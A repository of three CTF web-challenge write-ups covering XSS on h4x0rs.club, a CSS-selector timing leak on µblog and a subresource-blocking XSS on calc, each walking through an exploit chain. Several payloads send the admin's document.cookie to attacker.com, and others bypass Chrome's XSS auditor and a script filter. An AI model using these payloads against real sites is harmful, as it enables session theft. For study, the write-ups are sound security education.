├── 0ctf_quals-2018
    └── h4x0rs.club
    │   └── README.md
├── README.md
├── hxp-2018
    └── blog
    │   └── README.md
└── pwn2win-2019
    └── calc
        └── README.md


/0ctf_quals-2018/h4x0rs.club/README.md:
--------------------------------------------------------------------------------
 1 | # 0CTF 2018: h4x0rs.club  - Part II
 2 | 
 3 | **Category:** Web
 4 | **Points:** 687
 5 | **Solves:** 6
 6 | **Description:**
 7 | 
 8 | > Get document.cookie of the admin: https://h4x0rs.club/game/
 9 | 
10 | **Note:** This is an unintendend solution for the challenge.
11 | ## Write-up
12 |  
13 | ### Finding the XSS
14 | 
15 | There is a XSS on `/game/javascripts/app.js` in the function responsible for checking if the player won or lost the game.
16 | 
17 | ```
18 | function b() {
19 |        x(), $(".js-user").append($("#audiences").html()), $(".challenge-out-of-time").show();
20 |        [...]
21 |  }
22 | ```
23 | 
24 | The function above copies the html of an element with id `audiences` to an element with class `js-user` so by creating these elements using the injection on `/game/?msg=` we can achieve javascript execution.
25 | 
26 | Then, theoretically, by accessing `https://h4x0rs.club/game/?msg=<div id="audiences"><script>alert(1);</script></div><div class="js-user"></div>` and clicking on the play button an alert should pop up after around 15 seconds (the time it takes for the game to end).
27 | 
28 | But it doesn't, we are stopped by Chrome's XSS auditor which blocks the access to the page because it detected that a `script` tag on the URL was also reflected into the page.
29 | 
30 | We can bypass it by sending `https://h4x0rs.club/game/?msg=<div id="audiences"><script><!--alert(1);</script></div><div class="js-user"></div>` which isn't executed by the browser, but when appended by JQuery through the `append` function, will, surprisingly, ignore the `<!--`
31 | and add our tag to the `js-user` div.
32 | 
33 | ### Triggering the XSS
34 | 
35 | Finding the XSS isn't all that is needed to solve this challenge, given the user would have to click in the play button for the XSS to be triggered, and in this case, the admin will not interact in any way with the page after accessing it.
36 | 
37 | This is when the code on `/game/javascripts/client.js` comes in handy.
38 | 
39 | ```
40 | $( document ).ready(function() {
41 |     CLIENT_GAME.init();
42 |     [...]
43 |     setTimeout(function(){$('.js-difficulty').children().click();}, 1000);
44 | });
45 | ```
46 | 
47 | The code above will get all childrens of the elements with class `js-difficulty` and then click on them, exactly what we need to finish the chain.
48 | By creating a div with class `js-difficulty` and inside it creating another div with class `js-start-button` we can start the game without any user interaction.
49 | 
50 | You can test it by accessing:
51 | 
52 | ```https://h4x0rs.club/game/?msg=<div class="js-difficulty"><div class="js-start-button"></div></div>```
53 | 
54 | Combining these two we arrive at the final payload that will be sent to the admin:
55 | 
56 | ```https://h4x0rs.club/game/?msg=<div id="audiences"><script><!--location.href="http://attacker.com/?cookie="+document.cookie;</script></div><div class="js-user"></div><div class="js-difficulty"><div class="js-start-button"></div></div>```
57 | 
58 | ### Sending the payload
59 | 
60 | The biography also isn't being properly sanitized, so you can set it to:
61 | 
62 | ```<a href="http://attacker.com/redirect.html" id="report-btn"></a>```
63 | 
64 | Further, reporting your own profile to the admin with the hash `report` added to it will make the admin click on the link and be redirected to your website, because the code below is present in the page:
65 | 
66 | ```
67 | if(location.hash.slice(1) == 'report'){
68 |        document.getElementById('report-btn').click();
69 | }
70 | ```
71 | 
72 | Then you make `redirect.html` redirect the admin again to your final payload, which will start the game and trigger the XSS, sending his session (and the flag) back to you.
73 | 
74 | ## Flag
75 | 
76 | ```flag{postman_1n_the_middl3}```
77 | 
78 | ## Contact
79 | 
80 | If you have any questions feel free to contact me on [@lbherrera_](https://twitter.com/lbherrera_)
81 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Writeups
2 | 
3 | ## [0CTF 2018: h4x0rs.club - Part II](https://github.com/lbherrera/writeups/tree/master/0ctf_quals-2018/h4x0rs.club#0ctf-2018-h4x0rsclub----part-ii)
4 | 
5 | ## [hxp CTF 2018: µblog](https://github.com/lbherrera/writeups/tree/master/hxp-2018/blog#hxp-ctf-2018-%C2%B5blog)
6 | 
7 | ## [Pwn2Win CTF 2019: calc](https://github.com/lbherrera/writeups/tree/master/pwn2win-2019/calc#pwn2win-ctf-2019-calc)
8 | 


--------------------------------------------------------------------------------
/hxp-2018/blog/README.md:
--------------------------------------------------------------------------------
  1 | # hxp CTF 2018: µblog
  2 | 
  3 | **Category:** Web
  4 | **Points:** 412
  5 | **Solves:** 4
  6 | 
  7 | > Check out our newest (super hardened) µblogging platform :>\
  8 | > Please report any bugs to the admin (in the challenge)!
  9 | >
 10 | > Download: [µblog-b342cb10f1395bee.tar.xz](https://2018.ctf.link/assets/files/%C2%B5blog-b342cb10f1395bee.tar.xz)\
 11 | > Connection: http://195.201.125.245:7777/
 12 | 
 13 | ## Write-up
 14 |  
 15 | ### Baby steps
 16 | 
 17 | Upon entering the challenge's website we were presented with what appeared to be a simple blog with four main functionalities.
 18 | 1. A place to change the blog's settings (name and logo).
 19 | 2. A way to publish your own post, which can contain a text and also a logo.
 20 | 3. A list of all your posts.
 21 | 4. A place to report bugs to the admin.
 22 | 
 23 | The first thing we tried was to report our website to see whether the admin accessed it, and of course they didn't.
 24 | 
 25 | From reading the source code (that was given in the description) we got that it was only possible to send blogs (using the id parameter) to the admin, which eliminated several attack vectors.
 26 | ```php
 27 | if (isset($_POST['report']) && !empty($_POST['c']) && hash_equals($_SESSION['c'], $_POST['c']) && preg_match('/^http:\/\/127.0.0.1\/\?id=[0-9a-f]{8}-[0-9a-f]{4}-[4][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}/', $_POST['report'])){
 28 |     include 'backend.php';
 29 |     send_to_admin($_POST['report']);
 30 |     exit();
 31 | }
 32 | ```
 33 | 
 34 | After quickly analyzing the server's source code (and not finding any vulnerabilities) we decided to move on and analyze the application's HTML.
 35 | 
 36 | At the end of the page there was the following javascript, which immediately caught our attention:
 37 | ```javascript
 38 | if (!$('#news-container').html())
 39 |     $.each($('body').data('posts'),function(i,d) {
 40 |         $('#news-container').html($('#news-container').html()+$('#template').html() )
 41 |         $('#news-container .post:last .text ').text(d.text)
 42 |         $('#news-container .post:last .icon').attr("src",d.icon)
 43 |         $('#news-container .post:last .icon').attr("src",d.icon)
 44 |         $('#news-container .post:last .link').attr("href",d.url)
 45 |         $('#news-container .post:last').attr("id","post-"+d.id)
 46 |     })
 47 |     $(location.hash).addClass('highlight')
 48 | ```
 49 | 
 50 | On October of this year, [@ArthurSaftnes](https://twitter.com/ArthurSaftnes) released an impressive article ([A timing attack with CSS selectors and Javascript](https://blog.sheddow.xyz/css-timing-attack/)) talking about how it is possible to extract secrets from HTML
 51 | if user-controled input is executed inside $() by creatively abusing CSS selectors to create a delay which would allow an attacker to perform a timing attack.
 52 | 
 53 | We now had the foundation for an attack (the use of $(location.hash) to steal the admin's blog id), but we faced our first obstacle.
 54 | 
 55 | In his attack, the victim needs to access the attacker's website, and as far as we knew, there was no way to make the admin access a page other than an user's blog.
 56 | 
 57 | So we moved on again, to search for the other pieces of the puzzle.
 58 | 
 59 | ### Ping-pong
 60 | 
 61 | After our first finding, we started to test the website's endpoints, and while we weren't able to execute any javascript (inputs were being properly sanitized), we discovered that it was possible to set "//attacker.com" as the logo and then the image would end up being loaded from our website (both the settings and the post endpoints were vulnerable).
 62 | 
 63 | So we set our logo to "//requestbin.net/r/w6oc2hw6" and reported our blog to the admin and we finally got a hit:
 64 | 
 65 | ![headers](https://i.imgur.com/MeDD3WF.png)
 66 | 
 67 | We now had the confirmation that the admin was accessing our blog and also the version of Google Chrome they were using (so again we ruled out a few more attacks).
 68 | 
 69 | This discovery was really interesting, but surely couldn't be used as a way to time the delay caused by the selectors because the images would already have been loaded after reaching $(location.hash), right? ... right?
 70 | 
 71 | ### Reading between the lines
 72 | 
 73 | At this point, it seemed like we had hit a dead end. How were we supposed to detect the delay that would be caused in case we had a match?
 74 | 
 75 | After a thorough analyzis of the code, we found our answer. Let's check it line by line:
 76 | 
 77 | ```javascript
 78 | 1.   <script>
 79 | 2.       $('#logo').attr('src', $('body').data('logo'))
 80 | 3.       $('#name').text($('body').data('name'))
 81 | 4.   </script>
 82 | 5.   <div id="template" hidden>
 83 | 6.       <div class="post">
 84 | 7.          <div>
 85 | 8.              <img class="icon">
 86 | 9.          </div>
 87 | 10.         <div>
 88 | 11.             <p class="text"></p>
 89 | 12.         </div>
 90 | 13.         <div>
 91 | 14.             <a class="link">Link</a>
 92 | 15.         </div>
 93 | 16.      </div>
 94 | 17.      <hr>
 95 | 18.  <div>
 96 | 19.  <script>
 97 | 20.      if (!$('#news-container').html())
 98 | 21.         $.each($('body').data('posts'),function(i,d) {
 99 | 22.             $('#news-container').html($('#news-container').html()+$('#template').html() )
100 | 23.             $('#news-container .post:last .text ').text(d.text)
101 | 24.             $('#news-container .post:last .icon').attr("src",d.icon)
102 | 25.             $('#news-container .post:last .icon').attr("src",d.icon)
103 | 26.             $('#news-container .post:last .link').attr("href",d.url)
104 | 27.             $('#news-container .post:last').attr("id","post-"+d.id)
105 | 28.         })
106 | 29.         $(location.hash).addClass('highlight')
107 | 30.  </script>
108 | ```
109 | 
110 | When someone enters a blog, lines 2 and 3 will set the blog's name and logo. So far so good, nothing out of ordinary.
111 | 
112 | Then, line 20 will check if the ```news-container``` div is empty, which is the case, and because of that jump to line 21.
113 | 
114 | Line 21 will iterate thought the blog's posts, and lines 22 to 27 will be responsible for inserting each post's information inside the ```news-container``` div.
115 | 
116 | Finally, after all the posts have been inserted into the page, we get to line 29, which tries to add the highlight class to a div (the id of the div is retrieved from location.hash).
117 | 
118 | Wait a moment... line 20 doesn't use curly braces, so line 29 isn't part of the if condition. This means that even if the ```news-container``` div isn't empty, line 29 will be triggered. That's interesting...
119 | 
120 | Let's take a look at line 22 again. The html inside the ```news-container``` div is being inserted into itself plus the html of the ```template``` div. What is the content of the ```template``` div?
121 | 
122 | The ```template``` div starts at line 5 and ends at line 18.
123 | 
124 | Oh...
125 | 
126 | There is a bug in line 18. Instead of closing the div, it is actually opening a new one. So the ```template``` div goes from line 5 to line 30, including the script tag containing the javascript code.
127 | 
128 | This means that when line 22 is executed, the next javascript code executed won't be the one from line 23, but instead, it will be the one from line 20.
129 | 
130 | And now, given the ```news-container``` div is not empty anymore, lines 21 to 28 will be skipped and line 29 will be executed (because of the lack of curly braces). After that, the script that was running before resumes from line 23 and only then the posts' information are inserted into the div (including the post's logo).
131 | 
132 | ### Attack plan
133 | 
134 | With all this information it's possible to devise an attack plan:
135 | 
136 | 1. We set "//attacker.com/firstping" as our blog logo.
137 | 2. We create a post with the logo "//attacker.com/secondping".
138 | 3. We create a selector that will hang for a few seconds if the n char of body["data-user-id"] matches (selector must not have any spaces because of url encoding).
139 | 4. We report our blog to the admin, with the hash we created in step 3 added to it.
140 | 4. In our server, we calculate the time it takes between the request to /firstping and /secondping.
141 | 
142 | The full URL sent to the admin will look something like this:
143 | 
144 | ```http://127.0.0.1/?id=a6142ba5-e88b-4a77-8ec9-94aa45a57855#xxx,*:has(*:has(*:has(*:has(*:has(*:has(*)))))):has(body[data-user-id^='1'])```
145 | 
146 | If there is no match, the difference between /firstping and /secondping will be something like 20ms. If there is a match, the difference will be about 2000ms.
147 | 
148 | What is left is automating this process and then leak the full flag.
149 | 
150 | ## Flag
151 | 
152 | ```hxp{PHP_xHTML_CSS_JS_CSP_WTF_Security_._.}```
153 | 
154 | ## Contact
155 | 
156 | If you have any questions feel free to contact me on [@lbherrera_](https://twitter.com/lbherrera_)
157 | 


--------------------------------------------------------------------------------
/pwn2win-2019/calc/README.md:
--------------------------------------------------------------------------------
 1 | # Pwn2Win CTF 2019: calc
 2 | 
 3 | **Category:** Web
 4 | **Points:** 500
 5 | **Solves:** 0
 6 | 
 7 | > Our researchers found out a web interface used by Sophia to run complex calculations. Can you find a way to get the administrator's cookies?
 8 | >
 9 | > http://165.227.115.65/
10 | >
11 | > The administrator is using HeadlessChrome/79.0.3945.0.
12 | 
13 | ## Write-up
14 |  
15 | ### How it works?
16 | 
17 | The challenge's website is concise and you don't have much to work on:
18 | 
19 | 1. There is a place to report a link to the administrator (which must be prefixed with http://165.227.115.65/ - the challenge's IP).
20 | 2. There is a `calc` parameter which is being filtered by an external script file (which is same-origin to the challenge's page) and then is being eval'd.
21 | 3. There is a `xss` parameter that is being reflected at the end of the body.
22 | 4. The server uses a strict CSP, which doesn't allow you to use the injection to do much.
23 | 
24 | ### Digging deeper
25 | 
26 | By looking into the external script file, it is possible to notice that the `calc` parameter is being filtered as soon as the DOM is loaded and only numbers, +, - are being allowed. The length of characters is also limited to 100.
27 | 
28 | ```javascript
29 | window.addEventListener('DOMContentLoaded', () => {
30 |     let regex = /[^0-9\+\-]+/;
31 |     if (calc.length > 100) calc = "1337";
32 |     calc = calc.replace(/ /g, "+");
33 |     if (regex.test(calc)) calc = "1337";
34 | });
35 | ```
36 | Also, by checking the script on the main page, you can see the parameter is only executed after the page is fully loaded - meaning that it will only be eval'd after the external script has a chance to filter the input it got from the `calc` parameter.
37 | 
38 | ```javascript
39 | let calc = new URL(location).searchParams.get("calc") || "1337";
40 | onload = () => {
41 |     alert(eval(calc));
42 | }
43 | ```
44 | 
45 | After this assessment, one of the realizations is that if you are able to block the external script from loading, you can execute arbitrary javascript.
46 | 
47 | ### Prior research
48 | 
49 | There has been some research on the subject of selectively blocking subresources (https://www.reddit.com/r/Slackers/comments/c1mpmq/selectively_blocking_subresources_when_xss/). 
50 | 
51 | But none of these prior researches would work in the context of this challenge.
52 | 
53 | The intended solution required you to find a way to block subresources that were being loaded after the injection point by only using HTML injection.
54 | 
55 | ### Features created for good (or bad)
56 | 
57 | Before Chrome 77, it was not possible to do the preload of subresources that did an SRI verification without doing a double download of the same resource.
58 | 
59 | On Chrome 77, a new feature (https://www.chromestatus.com/feature/4967277059375104) was released which started allowing and honoring the integrity attribute on preload links.
60 | 
61 | It solved the problem of the double download, but created a new "problem" - if the hash on the integrity attribute doesn't match the real hash of the subresource, it will be blocked from loading :)
62 | 
63 | ### Payload
64 | 
65 | Knowing that it gets easy to construct a payload that will allow executing arbitrary javascript and stealing the administrator's cookies:
66 | 
67 | ```
68 | http://165.227.115.65/?xss=<link+rel=preload+as=script+integrity=sha256-1+href=filter.js>&calc=location=`//attacker.com/?${document.cookie}`
69 | ```
70 | 
71 | ## Flag
72 | 
73 | ```CTF-BR{s3l3c71v3_bl0ck1ng++}```
74 | 
75 | ## Contact
76 | 
77 | If you have any questions feel free to contact me on [@lbherrera_](https://twitter.com/lbherrera_)
78 | 


--------------------------------------------------------------------------------